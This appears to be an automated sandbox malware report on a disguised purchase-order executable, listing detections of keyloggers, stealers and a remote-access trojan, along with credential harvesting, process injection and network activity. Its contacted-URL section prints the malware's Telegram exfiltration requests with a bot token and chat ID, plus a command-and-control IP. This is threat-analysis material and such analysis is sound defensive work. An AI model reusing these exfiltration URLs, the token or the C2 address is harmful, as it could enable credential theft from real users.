Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ubygsn.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.7.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: MSBuild.exe, 00000003.00000002.4587722446.00000000015A9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.7.dr Binary or memory string: MsMpEng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information
barindex
Yara detected BrowserPasswordDump
Source: Yara match File source: 3.2.MSBuild.exe.7240000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.MSBuild.exe.45b5fa8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.MSBuild.exe.45b5fa8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.MSBuild.exe.7240000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.4616809591.0000000007240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4606149598.000000000441A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 6524, type: MEMORYSTR
Yara detected RedLine Stealer
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 6524, type: MEMORYSTR
Yara detected Snake Keylogger
Source: Yara match File source: 0000000E.00000002.4593828211.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 14.0.ubygsn.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000000.2385310132.0000000000982000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.4593828211.0000000002FB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ubygsn.exe PID: 3700, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\ubygsn.exe, type: DROPPED
Yara detected VIP Keylogger
Source: Yara match File source: 14.0.ubygsn.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000000.2385310132.0000000000982000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.4593828211.0000000002FB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ubygsn.exe PID: 3700, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\ubygsn.exe, type: DROPPED
Yara detected XWorm
Source: Yara match File source: 0.2.BQ_PO#385995.exe.2760a49b688.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BQ_PO#385995.exe.2760a493c48.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BQ_PO#385995.exe.2760a49b688.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BQ_PO#385995.exe.2760a493c48.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.4586871157.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2258559792.000002760A47C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4593226321.00000000033C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BQ_PO#385995.exe PID: 2244, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 6524, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 3.2.MSBuild.exe.7240000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.MSBuild.exe.45b5fa8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.MSBuild.exe.45b5fa8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.MSBuild.exe.7240000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.ubygsn.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000000.2385310132.0000000000982000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4616809591.0000000007240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4606149598.000000000441A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 6524, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ubygsn.exe PID: 3700, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\ubygsn.exe, type: DROPPED

Remote Access Functionality
barindex
Yara detected BrowserPasswordDump
Source: Yara match File source: 3.2.MSBuild.exe.7240000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.MSBuild.exe.45b5fa8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.MSBuild.exe.45b5fa8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.MSBuild.exe.7240000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.4616809591.0000000007240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4606149598.000000000441A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 6524, type: MEMORYSTR
Yara detected RedLine Stealer
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 6524, type: MEMORYSTR
Yara detected Snake Keylogger
Source: Yara match File source: 0000000E.00000002.4593828211.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 14.0.ubygsn.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000000.2385310132.0000000000982000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.4593828211.0000000002FB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ubygsn.exe PID: 3700, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\ubygsn.exe, type: DROPPED
Yara detected VIP Keylogger
Source: Yara match File source: 14.0.ubygsn.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000000.2385310132.0000000000982000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.4593828211.0000000002FB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ubygsn.exe PID: 3700, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\ubygsn.exe, type: DROPPED
Yara detected XWorm
Source: Yara match File source: 0.2.BQ_PO#385995.exe.2760a49b688.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BQ_PO#385995.exe.2760a493c48.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BQ_PO#385995.exe.2760a49b688.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BQ_PO#385995.exe.2760a493c48.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.4586871157.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2258559792.000002760A47C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4593226321.00000000033C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BQ_PO#385995.exe PID: 2244, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 6524, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1569121 Sample: BQ_PO#385995.exe Startdate: 05/12/2024 Architecture: WINDOWS Score: 100 39 reallyfreegeoip.org 2->39 41 api.telegram.org 2->41 43 5 other IPs or domains 2->43 53 Suricata IDS alerts for network traffic 2->53 55 Found malware configuration 2->55 57 Malicious sample detected (through community Yara rule) 2->57 63 19 other signatures 2->63 9 BQ_PO#385995.exe 3 2->9         started        signatures3 59 Tries to detect the country of the analysis system (by using the IP) 39->59 61 Uses the Telegram API (likely for C&C communication) 41->61 process4 signatures5 75 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 9->75 77 Writes to foreign memory regions 9->77 79 Allocates memory in foreign processes 9->79 81 Injects a PE file into a foreign processes 9->81 12 MSBuild.exe 1 4 9->12         started        17 WerFault.exe 22 16 9->17         started        19 conhost.exe 9->19         started        21 MSBuild.exe 9->21         started        process6 dnsIp7 51 69.174.100.131, 49734, 7000 ASN-QUADRANET-GLOBALUS United States 12->51 35 C:\Users\user\AppData\Local\Temp\ubygsn.exe, PE32 12->35 dropped 83 Bypasses PowerShell execution policy 12->83 85 Adds a directory exclusion to Windows Defender 12->85 23 ubygsn.exe 15 2 12->23         started        27 powershell.exe 23 12->27         started        29 powershell.exe 23 12->29         started        37 C:\ProgramData\Microsoft\...\Report.wer, Unicode 17->37 dropped file8 signatures9 process10 dnsIp11 45 api.telegram.org 149.154.167.220, 443, 49863, 49882 TELEGRAMRU United Kingdom 23->45 47 checkip.dyndns.com 158.101.44.242, 49755, 49778, 49789 ORACLE-BMC-31898US United States 23->47 49 reallyfreegeoip.org 104.21.67.152, 443, 49765, 49771 CLOUDFLARENETUS United States 23->49 65 Antivirus detection for dropped file 23->65 67 Multi AV Scanner detection for dropped file 23->67 69 Tries to steal Mail credentials (via file / registry access) 23->69 73 2 other signatures 23->73 71 Loading BitLocker PowerShell Module 27->71 31 conhost.exe 27->31         started        33 conhost.exe 29->33         started        signatures12 process13
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false
104.21.67.152
 reallyfreegeoip.org United States
13335 CLOUDFLARENETUS false
69.174.100.131
 unknown United States
8100 ASN-QUADRANET-GLOBALUS true
158.101.44.242
 checkip.dyndns.com United States
31898 ORACLE-BMC-31898US false

Contacted Domains

Name IP Active
bg.microsoft.map.fastly.net 199.232.214.172 true
reallyfreegeoip.org 104.21.67.152 true
s-part-0035.t-0009.t-msedge.net 13.107.246.63 true
api.telegram.org 149.154.167.220 true
ax-0001.ax-msedge.net 150.171.28.10 true
fp2e7a.wpc.phicdn.net 192.229.221.95 true
checkip.dyndns.com 158.101.44.242 true
checkip.dyndns.org unknown unknown
tse1.mm.bing.net unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/bot7721085569:AAH1tkciy-nKykIEUNjOAUsItTcvNCVmFLo/sendDocument?chat_id=6236275763&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery false
    		high
    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:105270%0D%0ADate%20and%20Time:%2006/12/2024%20/%2010:34:50%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20105270%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
      		high
      http://checkip.dyndns.org/ false
        		high
        https://reallyfreegeoip.org/xml/8.46.123.228 false
          		high
          https://api.telegram.org/bot7721085569:AAH1tkciy-nKykIEUNjOAUsItTcvNCVmFLo/sendDocument?chat_id=6236275763&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery false
            		high
            69.174.100.131 true
            • Avira URL Cloud: safe
            		 unknown